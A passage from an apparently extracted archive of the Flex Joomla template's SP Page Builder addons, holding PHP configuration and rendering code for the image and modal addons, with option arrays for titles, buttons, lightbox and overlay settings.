						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
				),

				'shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
				),

				'block'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
						)
					),
					
					'button_peicon'=>array( // Pixeden Icons
						'type'=>'select', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
						'values'=> $peicon_list
					),

					'icon'=>array(
						'type'=>'icon',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
					),

					'icon_position'=>array(
						'type'=>'select',
						'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
						'values'=>array(
							'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
							'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
						),
						'std'=>'left'
					),

					'class'=>array(
						'type'=>'text',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
						'std'=>''
					),

				),
			),
		)
	);
PK!��&{''(flex/sppagebuilder/addons/image/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonImage extends SppagebuilderAddons{

	public function render() {

		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? ' '. $settings->class : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$title_position = (isset($settings->title_position) && $settings->title_position) ? $settings->title_position : 'top';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';

		//Options
		$image = (isset($settings->image) && $settings->image) ? $settings->image : '';
		
		$image_src = isset($image->src) ? $image->src : $image;
		
		$alt_text = (isset($settings->alt_text) && $settings->alt_text) ? $settings->alt_text : '';
		$position = (isset($settings->position) && $settings->position) ? $settings->position : '';
		$link = (isset($settings->link) && $settings->link) ? $settings->link : '';
		$target = (isset($settings->target) && $settings->target) ? 'rel="noopener noreferrer" target="' . $settings->target . '"' : '';
		$link_overlay_icon = (isset($settings->link_overlay_icon) && $settings->link_overlay_icon) ? 1 : 0;	
		$open_lightbox = (isset($settings->open_lightbox) && $settings->open_lightbox) ? $settings->open_lightbox : 0;
		$image_overlay = (isset($settings->overlay_color) && $settings->overlay_color) ? 1 : 0;
		
		
		//Lazyload image (from SPPB 3.7.0)
		$dimension = $this->get_image_dimension($image_src);
		$dimension = implode(' ',$dimension);
		
		//$placeholder = $image == '' ? false : $this->get_image_placeholder($image);
		
		$placeholder = $image_src == '' ? false : $this->get_image_placeholder($image_src);
		if(strpos($image_src, "http://") !== false || strpos($image_src, "https://") !== false){
			$image_src = $image_src;
		} else {
			$image_src = JURI::base(true) . '/' . $image_src;
		}
		/*
		if(strpos($image, "http://") !== false || strpos($image, "https://") !== false){
			$image = $image;
		} else {
			$image= JURI::base(true) . '/' . $image;
		}
		*/

		$output = '';

		if($image_src) {
			$output .= '<div class="sppb-addon sppb-addon-single-image ' . $position . $class . '">';
			$output .= ($title && $title_position != 'bottom') ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
			$output .= '<div class="sppb-addon-content">';
			$output .= '<div class="sppb-addon-single-image-container">';
			
			if (empty($alt_text)) {
				if (!empty($title)) {
					$alt_text = $title;
				} else {
					$alt_text = basename($image_src);
				}
			}

			if($image_overlay && $open_lightbox) {
				$output .= '<div class="sppb-addon-image-overlay">';
				$output .= '</div>';
			}

			if($open_lightbox) {
				$output .= '<a class="sppb-magnific-popup sppb-addon-image-overlay-icon" data-popup_type="image" data-mainclass="mfp-no-margins mfp-with-zoom" href="' . $image_src . '">+</a>';
			}

			if(!$open_lightbox) {
				if($link_overlay_icon) {
				   $output .= ($link) ? '<a ' . $target . ' href="' . $link . '"><div class="overlay"><i class="pe pe-7s-link"></i>' : '';
				} else {
				   $output .= ($link) ? '<a ' . $target . ' href="' . $link . '">' : '';
				}		
			}
			
			// Image
			if($has_lazyload) {
				// Lazyload for images with absolute URL
				$output .= '<img class="lazyload sppb-img-responsive' . $class . '" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $image_src .'" alt="'. $alt_text .'" data-expand="-5">';
			} else {
				$output .= '<img class="sppb-img-responsive'.($placeholder ? ' sppb-element-lazy' : '').'" src="' . ($placeholder ? $placeholder : $image_src) . '" '.($placeholder ? 'data-large="'.$image_src.'"' : '').' alt="'. $alt_text .'" title="'.$alt_text.'" '.($dimension ? $dimension : '').' loading="lazy">';
			}
			
			
			if(!$open_lightbox) {
				if($link_overlay_icon) {
				   $output .= ($link) ? '</div></a>' : '';
				} else {
				   $output .= ($link) ? '</a>' : '';
				}
			}
			$output  .= '</div>';
			$output  .= '</div>';
			$output .= ($title && $title_position == 'bottom') ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
			$output  .= '</div>';
		}

		return $output;
	}

	public function scripts() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/js/jquery.magnific-popup.min.js');
	}

	public function stylesheets() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/css/magnific-popup.css');
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$settings = $this->addon->settings;
		$open_lightbox = (isset($settings->open_lightbox) && $settings->open_lightbox) ? $settings->open_lightbox : 0;
		$style = (isset($settings->overlay_color) && $settings->overlay_color) ? 'background-color: ' . $settings->overlay_color . ';' : '';
		$style_img = (isset($settings->border_radius) && $settings->border_radius) ? 'border-radius: ' . $settings->border_radius . 'px;' : '';
		$title_padding = (isset($settings->title_padding) && $settings->title_padding) ? $settings->title_padding : '';
		$title_padding_sm = (isset($settings->title_padding_sm) && $settings->title_padding_sm) ? $settings->title_padding_sm : '';
		$title_padding_xs = (isset($settings->title_padding_xs) && $settings->title_padding_xs) ? $settings->title_padding_xs : '';

		$css = '';
		if($open_lightbox && $style) {
			$css .= $addon_id . ' .sppb-addon-image-overlay{';
				$css .= $style;
				$css .= $style_img;
			$css .= '}';
		}
		$css .= $addon_id . ' img{' . $style_img . '}';
		if($title_padding){
			$css .= $addon_id . ' .sppb-addon-title{padding: ' . $title_padding . '}';
		}
		if($title_padding_sm){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {' .$addon_id. ' .sppb-addon-title{padding: ' .$title_padding_sm . '}}';
		}
		if($title_padding_xs){
			$css .= '@media (max-width: 767px) {' .$addon_id. ' .sppb-addon-title{padding: ' . $title_padding_xs . '}}';
		}

		return $css;
	}

	public static function getTemplate() {
		$output = '
		<#
			var image_overlay = 0;
			if(!_.isEmpty(data.overlay_color)){
				image_overlay = 1;
			}
			var open_lightbox = parseInt(data.open_lightbox);
			var title_font_style = data.title_fontstyle || "";

			var alt_text = data.alt_text;

			if(_.isEmpty(alt_text)){
				if(!_.isEmpty(data.title)){
					alt_text = data.title;
				}
			}
		#>
		<style type="text/css">
			<# if(open_lightbox && data.overlay_color){ #>
				#sppb-addon-{{ data.id }} .sppb-addon-image-overlay{
					background-color: {{ data.overlay_color }};
					border-radius: {{ data.border_radius }}px;
				}
			<# } #>

			#sppb-addon-{{ data.id }} img{
				border-radius: {{ data.border_radius }}px;
			}
			#sppb-addon-{{ data.id }} .sppb-addon-title{
				<# if(_.isObject(data.title_padding)) { #>
					padding:{{data.title_padding.md}};
				<# } else { #>
					padding:{{data.title_padding}};
				<# } #>
			}
			@media (min-width: 768px) and (max-width: 991px) {
				<# if(_.isObject(data.title_padding)) { #>
					#sppb-addon-{{ data.id }} .sppb-addon-title{
						padding: {{data.title_padding.sm}};
					}
				<# } #>
			}
			@media (max-width: 767px) {
				<# if(_.isObject(data.title_padding)) { #>
					#sppb-addon-{{ data.id }} .sppb-addon-title{
						padding: {{data.title_padding.xs}};
					}
				<# } #>
			}
		</style>
		<# if(data.image){ 
			var media = {}
			if (typeof data.image !== "undefined" && typeof data.image.src !== "undefined") {
				media = data.image
			} else {
				media = {src: data.image, height:"", width:""}
			}
			#>
			<div class="sppb-addon sppb-addon-single-image {{ data.position }} {{ data.class }}">
				<# if( !_.isEmpty( data.title ) && data.title_position != "bottom" ){ #><{{ data.heading_selector }} class="sppb-addon-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="title" contenteditable="true">{{ data.title }}</{{ data.heading_selector }}><# } #>
				<div class="sppb-addon-content">
					<div class="sppb-addon-single-image-container">
						<# if(image_overlay && open_lightbox) { #>
							<div class="sppb-addon-image-overlay"></div>
						<# } #>
						<# if(open_lightbox) { #>
							<a class="sppb-magnific-popup sppb-addon-image-overlay-icon" data-popup_type="image" data-mainclass="mfp-no-margins mfp-with-zoom" href=\'{{ media.src }}\'>+</a>
						<# } #>
			
						<# if(!open_lightbox) { #>
							<# if(data.link_overlay_icon) { #>
								<a target="{{ data.target }}" href=\'{{ data.link }}\'>
								<div class="overlay"><i class="pe pe-7s-link"></i>
							<# } else { #>
								<a target="{{ data.target }}" href=\'{{ data.link }}\'>
							<# } #>	
						<# } #>
						
						<# if(media.src.indexOf("http://") == -1 && media.src.indexOf("https://") == -1){ #>
							<img class="sppb-img-responsive" src=\'{{ pagebuilder_base + media.src }}\' alt="{{ alt_text }}" title="{{ data.title }}">
						<# } else { #>
							<img class="sppb-img-responsive" src=\'{{ media.src }}\' alt="{{ alt_text }}" title="{{ data.title }}">
						<# } #>

						<# if(!open_lightbox) { #>
							<# if(data.link_overlay_icon) { #>
								</div></a>
							<# } else { #>
								</a>
							<# } #>	
						<# } #>

					</div>
					<# if( !_.isEmpty( data.title ) && data.title_position == "bottom" ){ #><{{ data.heading_selector }} class="sppb-addon-title">{{ data.title }}</{{ data.heading_selector }}><# } #>
				</div>
			</div>
		<# } #>
		';

		return $output;
	}

}
PK!~|�DD)flex/sppagebuilder/addons/image/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_image',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_DESC'),
		'category'=>'Media',
		'attr'=>array(
			'general' => array(
				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					)
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_POSITION'),
					'values'=>array(
						'top'=> 'Top',
						'bottom'=> 'Bottom',
					),
					'std'=>'top',
					'depends'=>array(array('title', '!=', '')),
				),

				'image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_SELECT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_SELECT_DESC'),
					'show_input' => true,
					'std'=> array(
						'src' => 'https://sppagebuilder.com/addons/image/image1.jpg',
						'height' => '',
						'width' => '',
					)
				),

				'border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_RADIUS'),
					'std'=>0,
					'max'=>1200
				),

				'alt_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ALT_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ALT_TEXT_DESC'),
					'std'=>'Image',
					'depends'=>array(
						array('image', '!=', ''),
					),
				),

				'position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
					'depends'=>array(
						array('image', '!=', ''),
					),
				),

				'open_lightbox'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_OPEN_LIGHTBOX'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_OPEN_LIGHTBOX_DESC'),
					'std'=>0,
					'depends'=>array(
						array('image', '!=', ''),
					),
				),

				'overlay_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_OVERLAY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_OVERLAY_DESC'),
					'std'=>'rgba(119, 219, 31, .5)',
					'depends'=>array(
						array('image', '!=', ''),
						array('open_lightbox', '!=', 0),
					),
				),

				'link'=>array(
					'type'=>'media',
					'format'=>'attachment',
					'hide_preview'=>true,
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_DESC'),
					'std'=>'',
					'depends'=>array(
						array('image', '!=', ''),
						array('open_lightbox', '!=', 1),
					),
				),

				'target'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
					),

					'depends'=>array(
						array('image', '!=', ''),
						array('link', '!=', ''),
						array('open_lightbox', '!=', 1),
					),
				),
				
				'link_overlay_icon'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_LINK_OVERLAY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_LINK_OVERLAY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
					),
					'std'=>1,
					'depends'=>array(
						array('image', '!=', ''),
						array('link', '!=', ''),
						array('open_lightbox', '!=', 1),
					),
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!x�� L L)flex/sppagebuilder/addons/modal/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_modal',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_DESC'),
		'category'=>'General',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'modal_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_DESC'),
					'values'=>array(
						'button'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_BUTTON'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
						'icon'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_TYPE_ICON'),
					),
					'std'=>'button',
				),

				// Button
				'button_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
					'std'=>'Button Text',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'secondary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std'=>'default',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_FAMILY'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.btn { font-family: "{{ VALUE }}"; }'
					),
					'depends'=>array(array('title', '!=', '')),
				),

				'button_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
					),
				),

				'button_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
					),
				),

				'button_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'std' => '',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
					),
				),

				'button_appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'flat',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_status'=>array(
					'type'=>'buttons',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
					'std'=>'normal',
					'values'=>array(
						array(
							'label' => 'Normal',
							'value' => 'normal'
						),
						array(
							'label' => 'Hover',
							'value' => 'hover'
						),
					),
					'tabs' => true,
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#444444',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_appearance', '!=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_background_gradient'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#B4EC51",
						"color2" => "#429321",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_appearance', '=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#fff',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_background_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#222',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_appearance', '!=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_background_gradient_hover'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#429321",
						"color2" => "#B4EC51",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_appearance', '=', 'gradient'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
						array('button_text', '!=', ''),
					)
				),
	
				'button_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#fff',
					'depends'=> array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
						array('button_text', '!=', ''),
					)
				),

				'button_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
